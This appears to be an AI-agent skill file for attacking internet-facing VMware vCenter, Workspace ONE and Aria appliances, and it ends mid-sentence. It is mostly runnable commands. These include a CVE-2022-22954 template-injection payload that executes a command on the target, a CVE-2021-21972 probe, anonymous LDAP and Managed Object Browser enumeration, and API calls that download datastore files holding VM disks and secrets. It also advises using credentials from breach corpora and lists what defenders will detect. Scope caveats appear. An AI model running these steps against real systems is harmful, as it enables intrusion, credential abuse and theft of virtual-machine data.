vmware-vcenter-attack

When to use

Trigger when external recon shows ANY of:

• Banner: "VMware vCenter Server", "VMware vSphere Client"
• URL paths: /ui, /ui/login, /websso/SAML2/Metadata, /sdk, /mob (Managed Object Browser)
• TLS cert SAN includes vcenter / vsphere / vcsa / psc / vmware
• Workspace ONE Access / Identity Manager: /SAAS, /SAAS/auth, /SAAS/login, /SAAS/horizon
• VMware Aria / vRealize: /vco, /vco-controlcenter, /orchestrator, /lcm/api/v1
• Horizon View: /portal, /admin

Do NOT use for:

• Internal-network vCenter (out of scope — external boundary discipline)
• Pure ESXi hypervisor exposed without management plane (rare on internet; flag as separate finding)

Step 1 — Version fingerprinting

TARGET="vcenter.target.com"

# Build info endpoint (often public; revealing exact patch level)
curl -sk "https://$TARGET/sdk/vimServiceVersions.xml"

# UI build (visible in page source)
curl -sk "https://$TARGET/ui/login" | grep -oE 'build[^"]{0,40}'
curl -sk "https://$TARGET/ui/" | grep -oE 'vsphere[^"]{0,40}'

# REST API version (vSphere 7+)
curl -sk "https://$TARGET/api/appliance/system/version"

# Cert metadata
echo | openssl s_client -connect "$TARGET:443" -servername "$TARGET" 2>/dev/null | openssl x509 -noout -text | grep -A1 "Subject Alt"

# SSO Admin Service (info disclosure)
curl -sk "https://$TARGET/sso-adminserver/sdk/vsphere.local"
curl -sk "https://$TARGET/websso/SAML2/Metadata/vsphere.local"

Map build → version → CVE applicability via VMware advisories (vmware.com/security/advisories).

Step 2 — CVE matrix (external-exploitable, sorted by historical impact)

Step 3 — CVE-2021-21972 probe (still common on stale appliances)

# Detection only — DO NOT execute the file upload without explicit scope OK
curl -sk -o /dev/null -w "%{http_code}\n" \
  "https://$TARGET/ui/vropspluginui/rest/services/uploadova"
# 405 → endpoint exists, version vulnerable
# 404 → patched (endpoint removed)
# 401 → patched (auth required)

curl -sk -o /dev/null -w "%{http_code}\n" \
  "https://$TARGET/ui/vropspluginui/rest/services/getstatus"

Public PoC by Mikhail Klyuchnikov exists; do not execute against client infra without explicit RCE-attempt sign-off.

Step 4 — CVE-2022-22954 (Workspace ONE SSTI) probe

# Workspace ONE Access vulnerable endpoint
curl -sk "https://$TARGET/catalog-portal/ui/oauth/verify?error=&deviceUdid=\${\"freemarker.template.utility.Execution\"?new()(\"id\")}"
# Look for "uid=" in response → confirmed RCE (Freemarker)

If page reflects template error / executes command → critical. Stop and report.

Step 5 — Default credentials (frequently still valid on lab/staging vCenters)

⚠ Do not spray vCenter — administrator@vsphere.local has VERY low lockout threshold (often 3 attempts → 60s lockout, configurable to permanent). One attempt with high-confidence guess only. Use creds discovered in breach corpora.

Step 6 — SSO / vmdir LDAP enumeration

# SSO Admin endpoint (frequently exposes domain info)
curl -sk "https://$TARGET/websso/SAML2/Metadata/vsphere.local" | xmllint --format -

# Extract Identity Source info
curl -sk "https://$TARGET/sso-adminserver/sdk/vsphere.local"

# Try anonymous LDAP bind to vmdir (port 389/636 if exposed)
ldapsearch -x -H "ldap://$TARGET:389" -b "" -s base
ldapsearch -x -H "ldap://$TARGET:389" -b "cn=Configuration,cn=vmware,cn=cis,dc=vsphere,dc=local"

Step 7 — Managed Object Browser (MOB) — frequently leaks data

curl -skI "https://$TARGET/mob"
# 401 → auth required (good for the defender)
# 200 → MOB exposed → can browse VMs, hosts, datastores, sessions without credentials in some misconfigs

# Auth'd MOB lets you walk the entire vSphere tree:
curl -sk -u 'administrator@vsphere.local:<pw>' "https://$TARGET/mob/?moid=ServiceInstance&doPath=content"

Step 8 — vSphere REST API enumeration (post-cred)

# Get session token
curl -sk -X POST -u 'user@vsphere.local:<pw>' "https://$TARGET/api/session"
# Returns: "<session-token>"

# List VMs
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/vm"

# List hosts
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/host"

# List datastores
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/api/vcenter/datastore"

# Datastore file download (HUGE — VMDK files, snapshots, credentials in cloud-init)
# /folder/<path>?dsName=<ds>&dcPath=<dc>
curl -sk -H "vmware-api-session-id: <token>" "https://$TARGET/folder?dsName=datastore1&dcPath=Datacenter"

Step 9 — Workspace ONE Access specific paths

# Metadata
curl -sk "https://$TARGET/SAAS/auth/saml/response"
curl -sk "https://$TARGET/SAAS/auth/wsfed/services/idp"
curl -sk "https://$TARGET/SAAS/jersey/manager/api/health"
curl -sk "https://$TARGET/catalog-portal/services/airwatch/identifiers"

# Login page
curl -sk "https://$TARGET/SAAS/login/0"

Step 10 — Aria / vRealize specific paths

# vRealize Operations Manager
curl -sk "https://$TARGET/suite-api/api/versions"
curl -sk "https://$TARGET/casa/nodes/thumbprints"

# Aria Automation
curl -sk "https://$TARGET/csp/gateway/am/api/about"
curl -sk "https://$TARGET/cluster-administration/api/health"

# vRealize Orchestrator
curl -sk "https://$TARGET/vco/api/about"
curl -sk "https://$TARGET/vco-controlcenter/api/health"

Tooling

• vCenter-Exploit collection (multiple PoCs on GitHub for 21972, 21985, 22005)
• Greenbone/openvas-scanner VMware NASL plugins — version detection
• nuclei templates: vmware-vcenter-*.yaml, cve-2021-21972.yaml, cve-2022-22954.yaml
• Metasploit modules: exploit/multi/http/vmware_vcenter_*

Detection patterns (what defenders/SOC will see)

• Excessive 404s on /ui/vropspluginui/* — IDS signature
• POST to /sdk from non-management IP
• administrator@vsphere.local auth failures
• TLS handshake fingerprint changes
• Plugin upload to vRealize endpoint

Pair with mid-engagement-ir-detection skill — vCenter is monitored heavily in